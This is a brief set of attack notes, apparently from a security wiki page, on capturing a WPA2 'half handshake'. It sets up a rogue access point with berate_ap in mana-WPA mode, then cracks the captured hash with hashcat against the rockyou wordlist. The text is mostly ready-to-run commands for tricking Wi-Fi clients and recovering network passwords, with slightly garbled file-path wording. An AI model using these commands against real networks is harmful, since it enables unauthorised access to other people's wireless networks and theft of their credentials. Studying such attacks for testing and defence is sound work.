Half Handshake Attack
./berate_ap -m bridge wlan0 eth0 -w 2 --mana-wpa --colour fakeAP testpass
# m -> method for internet sharing (Nat, bridge)
# > make wlan0 take internet from eth0
# w -> refer to the enctyption is WPA2
Half handshake was stored in file call
hostapd.hccapxin/tmpdirectory
then crack hash
hashcat -m 2500 /tmp/ **hostapd.hccapx /tmp/rockyou.txt**

Try to search how to run hashcat on GPU not on CPU
Last updated